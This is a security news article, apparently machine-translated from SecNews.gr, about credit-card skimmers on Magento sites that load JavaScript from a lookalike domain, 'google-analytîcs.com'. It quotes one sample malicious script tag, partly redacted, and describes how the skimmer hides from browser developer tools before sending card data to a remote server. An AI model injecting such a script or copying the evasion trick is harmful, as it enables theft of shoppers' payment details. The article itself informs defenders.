20 cities in Texas were hit by a coordinated ransomware attack
infosec

20 cities in Texas were hit by a coordinated ransomware attack

Twenty Texas local governments have been hit by a coordinated ransomware attack, the Information Resources Department announced Friday ...
Read More
infosec

Binance compensates the hacker who hacked it!

Binance, the cryptocurrency exchange company, intends to compensate the white hat hacker who breached his domain name and ...
Read More
infosec

The hacker who invaded Capital One has hacked other 30 companies

Further investigation into Paige A. Thompson, the hacker accused of causing data breach on Capital One, showed ...
Read More
infosec

Instantly update Windows 10 users. Critical vulnerabilities identified!

Microsoft warns Windows 10 users to update their operating system immediately because of two critical vulnerabilities. OR...
Read More
infosec

European Central Bank hacked!

The European Central Bank (ECB) closed one of its websites on Thursday after being hacked and infected by a hacker ...
Read More
Latest Posts

Malicious Google domains are used in card skimmer attacks

skimmerThe Criminals of cyberspace have found a new way to steal money by users, who do on-line transactions. Hackers use it false domains, which are supposed to be Google, and lead users to infringing sites. Seeing it domain, users think the site is safe. Some Sucuri researchers came into contact with a Magento website owner, and were informed that a domain was infected with a skimmer credit cards. Skimmer uses JavaScript code, which contains a link to it malicious address google-analytîcs [.] Com.

Here's an example of malicious code:

<script type = "text / javascript" src = "//google-analytîcs.com/www.[redacted]/3f5cf4657d5d9.js"> </ script>

The researchers said that hackers they use reputable names like Google, so visitors think that sites are safe. But they do not pay attention to the fact that there is one domain differentiation, which indicates that it is a malicious site.

Researchers have discovered that the particular skimmer is similar to others that are circulating and storing data, imported, as well as drop-down menu options.

However, skimmer checks if developer tools are used either in Google Chrome or in Mozilla Firefox. If used, it will not attempt to steal any information to avoid detection.

If no developer tools are found, they steal information and send them to a remote one server.

Card skimmers are installed through vulnerable e-commerce sites and are a serious and frequent problem. In July, the RiskIQ software company said it was a recent one campaign managed to infect more than 17.000 websites with card-skimming malware in just a few months.

Magento users, like WordPress and others Drupal they must constantly update their software. Magento domains are targeted by hackers trying to steal economic data. A report showed that 2018, the 83% of Magento websites found to be vulnerable to card skimmers.

Share
Do you have an opinion? Leave your comment.

The author allows you to copy his / her text only if you report the source (SecNews.gr), as an e-mail address (Live URL) of the article.
Updated on by

Reader Interactions

Leave a reply

Your email address is not published. Τα υποχρεωτικά πεδία σημειώνονται με *